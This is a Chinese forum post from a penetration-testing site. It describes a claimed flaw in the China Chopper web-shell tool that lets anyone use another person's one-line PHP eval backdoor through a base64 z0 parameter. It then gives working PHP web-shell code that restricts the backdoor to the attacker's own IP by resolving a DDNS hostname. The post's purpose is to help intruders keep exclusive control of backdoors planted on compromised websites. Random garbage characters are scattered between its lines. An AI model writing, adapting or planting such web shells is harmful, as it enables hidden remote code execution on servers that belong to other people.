中国网络渗透测试联盟

标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页]
作者: admin    时间: 2013-7-26 12:45
标题: 中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
8 U, O9 z' Q( a) `
. T& G! \& S, p: q  m; c1 s就算你设置了密码,使用了eval($_REQUEST['moyo']);
. ~. l" E3 b. D4 Y- f7 \0 E6 w
; t& x) G) q. f& ?7 e2 w9 O* P' q; e但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
& x& A" o( a- \
5 U6 a; F; i& [0 o' d  w因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
' b3 T0 E; S0 T) Q0 K# r
; |5 R( T/ s0 h6 I; m直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了7 H* R* \* N1 V' S$ a3 m
# D  H2 Z4 n; m  N$ d3 @4 M( v9 A
不知道是设计缺陷还是故意留的后门/ H: S& J. F2 }# x  V, T
* d* _7 G$ @$ V/ @7 E4 b- Y1 B( U
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用' H% H- G+ ~7 f4 N+ Y/ ?. T

; e9 A1 R' ~$ f+ X$ C5 l本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org8 g+ M6 W7 G- X; J) ~) \; O8 H
( y+ v# n+ V1 m. d% u; o
然后一句话后门这样写
, S! n' s4 C2 Q) C1 F' c% N7 t
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
" U4 F; A* @/ N( I! b( Z这样就可以让一句话后门只允许自己的电脑连接了
/ S7 G: w- w$ ?/ G. h
1 c% v" a2 g9 j3 U6 y& D



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2